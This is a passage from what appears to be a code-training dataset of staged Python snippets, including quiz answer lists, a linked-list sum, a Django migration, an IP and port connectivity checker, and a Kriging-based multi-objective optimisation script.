'world war two', 'world war two']
# Russia
Russia = ['Russia', 'russia', 'rusia', 'ra', 'Ra', 'Rusia', 'Ru']
RJW = ['1904', 'TRJW', 'trjw']
|
flexible
|
{
"blob_id": "6e07dcc3f3b8c7fbf8ce8d481b9612e7496967bd",
"index": 8316,
"step-1": "<mask token>\n",
"step-2": "Ylist = ['yes', 'Yes', 'Y', 'y']\nNlist = ['no', 'No', 'N', 'n']\nAmerica = ['America', 'america', 'amer', 'rica']\nTRW = ['1775', 'The Revolutionary war', 'the Revolutionary war',\n 'the revolutionary war', 'The Revolutionary War', 'trw', 'Trw', 'TRW']\nTCW = ['1861', 'The civil war', 'The civil War', 'The Civil war',\n 'The Civil war', 'The civil War', 'The Civil War', 'TCW', 'tcw', 'Tcw']\nTGW = ['1917', 'The Great War', 'the great war', 'the great War',\n 'the Great war', 'The great war', 'WW1', 'ww1', 'Ww1', 'wW1',\n 'World War One', 'World war 1']\nWW2 = ['1941', 'WW2', 'ww2', 'Ww2', 'W2', 'World war two', 'World war two',\n 'World War 2', 'World War Two', 'world war two', 'world war two']\nRussia = ['Russia', 'russia', 'rusia', 'ra', 'Ra', 'Rusia', 'Ru']\nRJW = ['1904', 'TRJW', 'trjw']\n",
"step-3": "Ylist = ['yes', 'Yes', 'Y', 'y']\r\nNlist = ['no', 'No', 'N', 'n']\r\nAmerica = ['America', 'america', 'amer', 'rica']\r\nTRW = ['1775', 'The Revolutionary war', 'the Revolutionary war', 'the revolutionary war', 'The Revolutionary War',\r\n 'trw', 'Trw', 'TRW']\r\nTCW = ['1861', 'The civil war', 'The civil War', 'The Civil war', 'The Civil war', 'The civil War', 'The Civil War',\r\n 'TCW', 'tcw', 'Tcw']\r\nTGW = ['1917', 'The Great War', 'the great war', 'the great War', 'the Great war', 'The great war', 'WW1', 'ww1', 'Ww1',\r\n 'wW1', 'World War One', 'World war 1']\r\nWW2 = ['1941', 'WW2', 'ww2', 'Ww2', 'W2', 'World war two', 'World war two', 'World War 2', 'World War Two',\r\n 'world war two', 'world war two']\r\n# Russia\r\nRussia = ['Russia', 'russia', 'rusia', 'ra', 'Ra', 'Rusia', 'Ru']\r\nRJW = ['1904', 'TRJW', 'trjw']\r\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
class ListNode(object):
def __init__(self, val, next=None):
self.val = val
self.next = next
class Solution:
"""
@param l1: the first list
@param l2: the second list
@return: the sum list of l1 and l2
"""
def addLists(self, l1, l2):
res = ListNode(0)
p = res
carry = 0
while l1 or l2 or carry:
num = 0
if l1:
num += l1.val
l1 = l1.next
if l2:
num += l2.val
l2 = l2.next
num += carry
digit, carry = num % 10, num // 10
node = ListNode(digit)
p.next = node
p = p.next
return res.next
|
normal
|
{
"blob_id": "8909ee9c54a234222a41249e1f3005fd86e21cf0",
"index": 1782,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-2": "<mask token>\n\n\nclass Solution:\n \"\"\"\n @param l1: the first list\n @param l2: the second list\n @return: the sum list of l1 and l2\n \"\"\"\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-3": "class ListNode(object):\n <mask token>\n\n\nclass Solution:\n \"\"\"\n @param l1: the first list\n @param l2: the second list\n @return: the sum list of l1 and l2\n \"\"\"\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-4": "class ListNode(object):\n\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n \"\"\"\n @param l1: the first list\n @param l2: the second list\n @return: the sum list of l1 and l2\n \"\"\"\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def differences(a, b):
""""""
c = a[a != b]
d = b[a != b]
nums = nonzero(a != b)[0]
return concatenate((mat(nums), c, d)).T
<|reserved_special_token_1|>
from numpy import *
def differences(a, b):
""""""
c = a[a != b]
d = b[a != b]
nums = nonzero(a != b)[0]
return concatenate((mat(nums), c, d)).T
<|reserved_special_token_1|>
#encoding:UTF-8
from numpy import *
#----------------------------------------------------------------------
def differences(a, b):
""""""
c = a[a!=b]
d = b[a!=b]
nums = nonzero(a!=b)[0]
return concatenate((mat(nums), c, d)).T
|
flexible
|
{
"blob_id": "67a76f1f1dad4b7e73359f04ca8f599c8d32dc92",
"index": 2900,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef differences(a, b):\n \"\"\"\"\"\"\n c = a[a != b]\n d = b[a != b]\n nums = nonzero(a != b)[0]\n return concatenate((mat(nums), c, d)).T\n",
"step-3": "from numpy import *\n\n\ndef differences(a, b):\n \"\"\"\"\"\"\n c = a[a != b]\n d = b[a != b]\n nums = nonzero(a != b)[0]\n return concatenate((mat(nums), c, d)).T\n",
"step-4": "#encoding:UTF-8\n\nfrom numpy import *\n\n#----------------------------------------------------------------------\ndef differences(a, b):\n \"\"\"\"\"\"\n c = a[a!=b]\n d = b[a!=b]\n nums = nonzero(a!=b)[0]\n return concatenate((mat(nums), c, d)).T",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('sepomex', '0006_auto_20151113_2154')]
operations = [migrations.CreateModel(name='MXCiudad', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('nombre', models.CharField(max_length=
200)), ('mx_estado', models.ForeignKey(on_delete=django.db.models.
deletion.CASCADE, related_name='ciudades', to='sepomex.MXEstado'))]
), migrations.AddField(model_name='mxasentamiento', name=
'mx_ciudad', field=models.ForeignKey(default='', on_delete=django.
db.models.deletion.CASCADE, related_name='ciudad', to=
'sepomex.MXCiudad'), preserve_default=False)]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [('sepomex', '0006_auto_20151113_2154')]
operations = [migrations.CreateModel(name='MXCiudad', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('nombre', models.CharField(max_length=
200)), ('mx_estado', models.ForeignKey(on_delete=django.db.models.
deletion.CASCADE, related_name='ciudades', to='sepomex.MXEstado'))]
), migrations.AddField(model_name='mxasentamiento', name=
'mx_ciudad', field=models.ForeignKey(default='', on_delete=django.
db.models.deletion.CASCADE, related_name='ciudad', to=
'sepomex.MXCiudad'), preserve_default=False)]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-23 17:10
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('sepomex', '0006_auto_20151113_2154'),
]
operations = [
migrations.CreateModel(
name='MXCiudad',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=200)),
('mx_estado', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ciudades', to='sepomex.MXEstado')),
],
),
migrations.AddField(
model_name='mxasentamiento',
name='mx_ciudad',
field=models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, related_name='ciudad', to='sepomex.MXCiudad'),
preserve_default=False,
),
]
|
flexible
|
{
"blob_id": "99c27d13349eba391866cfed25cc052b40910ea5",
"index": 2837,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('sepomex', '0006_auto_20151113_2154')]\n operations = [migrations.CreateModel(name='MXCiudad', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('nombre', models.CharField(max_length=\n 200)), ('mx_estado', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, related_name='ciudades', to='sepomex.MXEstado'))]\n ), migrations.AddField(model_name='mxasentamiento', name=\n 'mx_ciudad', field=models.ForeignKey(default='', on_delete=django.\n db.models.deletion.CASCADE, related_name='ciudad', to=\n 'sepomex.MXCiudad'), preserve_default=False)]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('sepomex', '0006_auto_20151113_2154')]\n operations = [migrations.CreateModel(name='MXCiudad', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('nombre', models.CharField(max_length=\n 200)), ('mx_estado', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, related_name='ciudades', to='sepomex.MXEstado'))]\n ), migrations.AddField(model_name='mxasentamiento', name=\n 'mx_ciudad', field=models.ForeignKey(default='', on_delete=django.\n db.models.deletion.CASCADE, related_name='ciudad', to=\n 'sepomex.MXCiudad'), preserve_default=False)]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.2 on 2017-06-23 17:10\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sepomex', '0006_auto_20151113_2154'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='MXCiudad',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('nombre', models.CharField(max_length=200)),\n ('mx_estado', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ciudades', to='sepomex.MXEstado')),\n ],\n ),\n migrations.AddField(\n model_name='mxasentamiento',\n name='mx_ciudad',\n field=models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, related_name='ciudad', to='sepomex.MXCiudad'),\n preserve_default=False,\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
'''
Created on Sep 4, 2014
@author: Jay <smile665@gmail.com>
'''
import socket
def ip_validation(ip):
'''
check if the ip address is in a valid format.
'''
try:
socket.inet_aton(ip)
return True
except socket.error:
return False
def connection_validation(ip, port):
'''
check if the ip:port can be connected using socket.
@param port: the port is an integer.
'''
if not ip_validation(ip):
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
result = sock.connect_ex((ip, port))
if result == 0:
return True
else:
return False
if __name__ == '__main__':
ip = '192.168.213.11'
port = 90
print ip_validation(ip)
print connection_validation(ip, port)
|
normal
|
{
"blob_id": "2bc9c0711831d9ed9009d0f9600153709bbcd6da",
"index": 9178,
"step-1": "'''\nCreated on Sep 4, 2014\n\n@author: Jay <smile665@gmail.com>\n'''\n\nimport socket\n\n\ndef ip_validation(ip):\n '''\n check if the ip address is in a valid format.\n '''\n try:\n socket.inet_aton(ip)\n return True\n except socket.error:\n return False\n\n\ndef connection_validation(ip, port):\n '''\n check if the ip:port can be connected using socket.\n @param port: the port is an integer.\n '''\n if not ip_validation(ip):\n return False\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(2)\n result = sock.connect_ex((ip, port))\n if result == 0:\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n ip = '192.168.213.11'\n port = 90\n print ip_validation(ip)\n print connection_validation(ip, port)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def generate_kriging():
nsample = 20
nvar = 2
nobj = 2
lb = -1 * np.ones(shape=[nvar])
ub = 1 * np.ones(shape=[nvar])
sampoption = 'halton'
samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',
upbound=ub, lobound=lb)
X = sample
global y
y = evaluate(X, 'schaffer')
KrigInfo1 = initkriginfo()
KrigInfo1['X'] = X
KrigInfo1['y'] = y[:, 0].reshape(-1, 1)
KrigInfo1['problem'] = 'schaffer'
KrigInfo1['nrestart'] = 5
KrigInfo1['ub'] = ub
KrigInfo1['lb'] = lb
KrigInfo1['optimizer'] = 'lbfgsb'
KrigInfo2 = deepcopy(KrigInfo1)
KrigInfo2['y'] = y[:, 1].reshape(-1, 1)
krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj1.train(n_cpu=n_cpu)
loocverr1, _ = krigobj1.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr1, '%')
krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj2.train(n_cpu=n_cpu)
loocverr2, _ = krigobj2.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr2, '%')
return krigobj1, krigobj2
def runopt(krigobj1, krigobj2):
moboInfo = dict()
moboInfo['nup'] = 3
moboInfo['nrestart'] = 10
moboInfo['acquifunc'] = 'ehvi'
moboInfo['acquifuncopt'] = 'lbfgsb'
Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5
)
xupdate, yupdate, supdate, metricall = Optim.run(disp=True)
return xupdate, yupdate, metricall
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def generate_kriging():
nsample = 20
nvar = 2
nobj = 2
lb = -1 * np.ones(shape=[nvar])
ub = 1 * np.ones(shape=[nvar])
sampoption = 'halton'
samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',
upbound=ub, lobound=lb)
X = sample
global y
y = evaluate(X, 'schaffer')
KrigInfo1 = initkriginfo()
KrigInfo1['X'] = X
KrigInfo1['y'] = y[:, 0].reshape(-1, 1)
KrigInfo1['problem'] = 'schaffer'
KrigInfo1['nrestart'] = 5
KrigInfo1['ub'] = ub
KrigInfo1['lb'] = lb
KrigInfo1['optimizer'] = 'lbfgsb'
KrigInfo2 = deepcopy(KrigInfo1)
KrigInfo2['y'] = y[:, 1].reshape(-1, 1)
krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj1.train(n_cpu=n_cpu)
loocverr1, _ = krigobj1.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr1, '%')
krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj2.train(n_cpu=n_cpu)
loocverr2, _ = krigobj2.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr2, '%')
return krigobj1, krigobj2
def runopt(krigobj1, krigobj2):
moboInfo = dict()
moboInfo['nup'] = 3
moboInfo['nrestart'] = 10
moboInfo['acquifunc'] = 'ehvi'
moboInfo['acquifuncopt'] = 'lbfgsb'
Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5
)
xupdate, yupdate, supdate, metricall = Optim.run(disp=True)
return xupdate, yupdate, metricall
if __name__ == '__main__':
krigobj1, krigobj2 = generate_kriging()
xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)
print(metricall)
plt.scatter(y[:, 0], y[:, 1])
plt.scatter(yupdate[:, 0], yupdate[:, 1])
plt.show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.environ['MKL_NUM_THREADS'] = '1'
os.environ['OPENBLAS_NUM_THREADS'] = '1'
os.environ['MKL_DEBUG_CPU_TYPE'] = '5'
<|reserved_special_token_0|>
def generate_kriging():
nsample = 20
nvar = 2
nobj = 2
lb = -1 * np.ones(shape=[nvar])
ub = 1 * np.ones(shape=[nvar])
sampoption = 'halton'
samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',
upbound=ub, lobound=lb)
X = sample
global y
y = evaluate(X, 'schaffer')
KrigInfo1 = initkriginfo()
KrigInfo1['X'] = X
KrigInfo1['y'] = y[:, 0].reshape(-1, 1)
KrigInfo1['problem'] = 'schaffer'
KrigInfo1['nrestart'] = 5
KrigInfo1['ub'] = ub
KrigInfo1['lb'] = lb
KrigInfo1['optimizer'] = 'lbfgsb'
KrigInfo2 = deepcopy(KrigInfo1)
KrigInfo2['y'] = y[:, 1].reshape(-1, 1)
krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj1.train(n_cpu=n_cpu)
loocverr1, _ = krigobj1.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr1, '%')
krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj2.train(n_cpu=n_cpu)
loocverr2, _ = krigobj2.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr2, '%')
return krigobj1, krigobj2
def runopt(krigobj1, krigobj2):
moboInfo = dict()
moboInfo['nup'] = 3
moboInfo['nrestart'] = 10
moboInfo['acquifunc'] = 'ehvi'
moboInfo['acquifuncopt'] = 'lbfgsb'
Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5
)
xupdate, yupdate, supdate, metricall = Optim.run(disp=True)
return xupdate, yupdate, metricall
if __name__ == '__main__':
krigobj1, krigobj2 = generate_kriging()
xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)
print(metricall)
plt.scatter(y[:, 0], y[:, 1])
plt.scatter(yupdate[:, 0], yupdate[:, 1])
plt.show()
<|reserved_special_token_1|>
import os
os.environ['MKL_NUM_THREADS'] = '1'
os.environ['OPENBLAS_NUM_THREADS'] = '1'
os.environ['MKL_DEBUG_CPU_TYPE'] = '5'
import numpy as np
from matplotlib import pyplot as plt
from copy import deepcopy
from kadal.optim_tools.MOBO import MOBO
from kadal.surrogate_models.kriging_model import Kriging
from kadal.surrogate_models.supports.initinfo import initkriginfo
from kadal.testcase.analyticalfcn.cases import evaluate
from kadal.misc.sampling.samplingplan import sampling
def generate_kriging():
nsample = 20
nvar = 2
nobj = 2
lb = -1 * np.ones(shape=[nvar])
ub = 1 * np.ones(shape=[nvar])
sampoption = 'halton'
samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',
upbound=ub, lobound=lb)
X = sample
global y
y = evaluate(X, 'schaffer')
KrigInfo1 = initkriginfo()
KrigInfo1['X'] = X
KrigInfo1['y'] = y[:, 0].reshape(-1, 1)
KrigInfo1['problem'] = 'schaffer'
KrigInfo1['nrestart'] = 5
KrigInfo1['ub'] = ub
KrigInfo1['lb'] = lb
KrigInfo1['optimizer'] = 'lbfgsb'
KrigInfo2 = deepcopy(KrigInfo1)
KrigInfo2['y'] = y[:, 1].reshape(-1, 1)
krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj1.train(n_cpu=n_cpu)
loocverr1, _ = krigobj1.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr1, '%')
krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj2.train(n_cpu=n_cpu)
loocverr2, _ = krigobj2.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr2, '%')
return krigobj1, krigobj2
def runopt(krigobj1, krigobj2):
moboInfo = dict()
moboInfo['nup'] = 3
moboInfo['nrestart'] = 10
moboInfo['acquifunc'] = 'ehvi'
moboInfo['acquifuncopt'] = 'lbfgsb'
Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5
)
xupdate, yupdate, supdate, metricall = Optim.run(disp=True)
return xupdate, yupdate, metricall
if __name__ == '__main__':
krigobj1, krigobj2 = generate_kriging()
xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)
print(metricall)
plt.scatter(y[:, 0], y[:, 1])
plt.scatter(yupdate[:, 0], yupdate[:, 1])
plt.show()
<|reserved_special_token_1|>
import os
# Set a single thread per process for numpy with MKL/BLAS
os.environ['MKL_NUM_THREADS'] = '1'
os.environ['OPENBLAS_NUM_THREADS'] = '1'
os.environ['MKL_DEBUG_CPU_TYPE'] = '5'
import numpy as np
from matplotlib import pyplot as plt
from copy import deepcopy
from kadal.optim_tools.MOBO import MOBO
from kadal.surrogate_models.kriging_model import Kriging
from kadal.surrogate_models.supports.initinfo import initkriginfo
from kadal.testcase.analyticalfcn.cases import evaluate
from kadal.misc.sampling.samplingplan import sampling
def generate_kriging():
# Sampling
nsample = 20
nvar = 2
nobj = 2
lb = -1 * np.ones(shape=[nvar])
ub = 1 * np.ones(shape=[nvar])
sampoption = "halton"
samplenorm, sample = sampling(sampoption, nvar, nsample, result="real",
upbound=ub, lobound=lb)
X = sample
# Evaluate sample
global y
y = evaluate(X, "schaffer")
# Initialize KrigInfo
KrigInfo1 = initkriginfo()
# Set KrigInfo
KrigInfo1["X"] = X
KrigInfo1["y"] = y[:, 0].reshape(-1, 1)
KrigInfo1["problem"] = "schaffer"
KrigInfo1["nrestart"] = 5
KrigInfo1["ub"] = ub
KrigInfo1["lb"] = lb
KrigInfo1["optimizer"] = "lbfgsb"
# Initialize KrigInfo
KrigInfo2 = deepcopy(KrigInfo1)
KrigInfo2['y'] = y[:, 1].reshape(-1, 1)
# Run Kriging
krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj1.train(n_cpu=n_cpu)
loocverr1, _ = krigobj1.loocvcalc()
print("LOOCV error of Kriging model: ", loocverr1, "%")
krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj2.train(n_cpu=n_cpu)
loocverr2, _ = krigobj2.loocvcalc()
print("LOOCV error of Kriging model: ", loocverr2, "%")
return krigobj1, krigobj2
def runopt(krigobj1, krigobj2):
moboInfo = dict()
moboInfo["nup"] = 3
moboInfo["nrestart"] = 10
moboInfo["acquifunc"] = "ehvi"
moboInfo["acquifuncopt"] = "lbfgsb"
Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5)
xupdate, yupdate, supdate, metricall = Optim.run(disp=True)
return xupdate, yupdate, metricall
if __name__ == '__main__':
krigobj1, krigobj2 = generate_kriging()
xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)
print(metricall)
plt.scatter(y[:, 0], y[:, 1])
plt.scatter(yupdate[:, 0], yupdate[:, 1])
plt.show()
|
flexible
|
{
"blob_id": "ba289bcdc0aa7c2ad70dba7fac541900d0b55387",
"index": 7585,
"step-1": "<mask token>\n\n\ndef generate_kriging():\n nsample = 20\n nvar = 2\n nobj = 2\n lb = -1 * np.ones(shape=[nvar])\n ub = 1 * np.ones(shape=[nvar])\n sampoption = 'halton'\n samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',\n upbound=ub, lobound=lb)\n X = sample\n global y\n y = evaluate(X, 'schaffer')\n KrigInfo1 = initkriginfo()\n KrigInfo1['X'] = X\n KrigInfo1['y'] = y[:, 0].reshape(-1, 1)\n KrigInfo1['problem'] = 'schaffer'\n KrigInfo1['nrestart'] = 5\n KrigInfo1['ub'] = ub\n KrigInfo1['lb'] = lb\n KrigInfo1['optimizer'] = 'lbfgsb'\n KrigInfo2 = deepcopy(KrigInfo1)\n KrigInfo2['y'] = y[:, 1].reshape(-1, 1)\n krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj1.train(n_cpu=n_cpu)\n loocverr1, _ = krigobj1.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr1, '%')\n krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj2.train(n_cpu=n_cpu)\n loocverr2, _ = krigobj2.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr2, '%')\n return krigobj1, krigobj2\n\n\ndef runopt(krigobj1, krigobj2):\n moboInfo = dict()\n moboInfo['nup'] = 3\n moboInfo['nrestart'] = 10\n moboInfo['acquifunc'] = 'ehvi'\n moboInfo['acquifuncopt'] = 'lbfgsb'\n Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5\n )\n xupdate, yupdate, supdate, metricall = Optim.run(disp=True)\n return xupdate, yupdate, metricall\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef generate_kriging():\n nsample = 20\n nvar = 2\n nobj = 2\n lb = -1 * np.ones(shape=[nvar])\n ub = 1 * np.ones(shape=[nvar])\n sampoption = 'halton'\n samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',\n upbound=ub, lobound=lb)\n X = sample\n global y\n y = evaluate(X, 'schaffer')\n KrigInfo1 = initkriginfo()\n KrigInfo1['X'] = X\n KrigInfo1['y'] = y[:, 0].reshape(-1, 1)\n KrigInfo1['problem'] = 'schaffer'\n KrigInfo1['nrestart'] = 5\n KrigInfo1['ub'] = ub\n KrigInfo1['lb'] = lb\n KrigInfo1['optimizer'] = 'lbfgsb'\n KrigInfo2 = deepcopy(KrigInfo1)\n KrigInfo2['y'] = y[:, 1].reshape(-1, 1)\n krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj1.train(n_cpu=n_cpu)\n loocverr1, _ = krigobj1.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr1, '%')\n krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj2.train(n_cpu=n_cpu)\n loocverr2, _ = krigobj2.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr2, '%')\n return krigobj1, krigobj2\n\n\ndef runopt(krigobj1, krigobj2):\n moboInfo = dict()\n moboInfo['nup'] = 3\n moboInfo['nrestart'] = 10\n moboInfo['acquifunc'] = 'ehvi'\n moboInfo['acquifuncopt'] = 'lbfgsb'\n Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5\n )\n xupdate, yupdate, supdate, metricall = Optim.run(disp=True)\n return xupdate, yupdate, metricall\n\n\nif __name__ == '__main__':\n krigobj1, krigobj2 = generate_kriging()\n xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)\n print(metricall)\n plt.scatter(y[:, 0], y[:, 1])\n plt.scatter(yupdate[:, 0], yupdate[:, 1])\n plt.show()\n",
"step-3": "<mask token>\nos.environ['MKL_NUM_THREADS'] = '1'\nos.environ['OPENBLAS_NUM_THREADS'] = '1'\nos.environ['MKL_DEBUG_CPU_TYPE'] = '5'\n<mask token>\n\n\ndef generate_kriging():\n nsample = 20\n nvar = 2\n nobj = 2\n lb = -1 * np.ones(shape=[nvar])\n ub = 1 * np.ones(shape=[nvar])\n sampoption = 'halton'\n samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',\n upbound=ub, lobound=lb)\n X = sample\n global y\n y = evaluate(X, 'schaffer')\n KrigInfo1 = initkriginfo()\n KrigInfo1['X'] = X\n KrigInfo1['y'] = y[:, 0].reshape(-1, 1)\n KrigInfo1['problem'] = 'schaffer'\n KrigInfo1['nrestart'] = 5\n KrigInfo1['ub'] = ub\n KrigInfo1['lb'] = lb\n KrigInfo1['optimizer'] = 'lbfgsb'\n KrigInfo2 = deepcopy(KrigInfo1)\n KrigInfo2['y'] = y[:, 1].reshape(-1, 1)\n krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj1.train(n_cpu=n_cpu)\n loocverr1, _ = krigobj1.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr1, '%')\n krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj2.train(n_cpu=n_cpu)\n loocverr2, _ = krigobj2.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr2, '%')\n return krigobj1, krigobj2\n\n\ndef runopt(krigobj1, krigobj2):\n moboInfo = dict()\n moboInfo['nup'] = 3\n moboInfo['nrestart'] = 10\n moboInfo['acquifunc'] = 'ehvi'\n moboInfo['acquifuncopt'] = 'lbfgsb'\n Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5\n )\n xupdate, yupdate, supdate, metricall = Optim.run(disp=True)\n return xupdate, yupdate, metricall\n\n\nif __name__ == '__main__':\n krigobj1, krigobj2 = generate_kriging()\n xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)\n print(metricall)\n plt.scatter(y[:, 0], y[:, 1])\n plt.scatter(yupdate[:, 0], yupdate[:, 1])\n plt.show()\n",
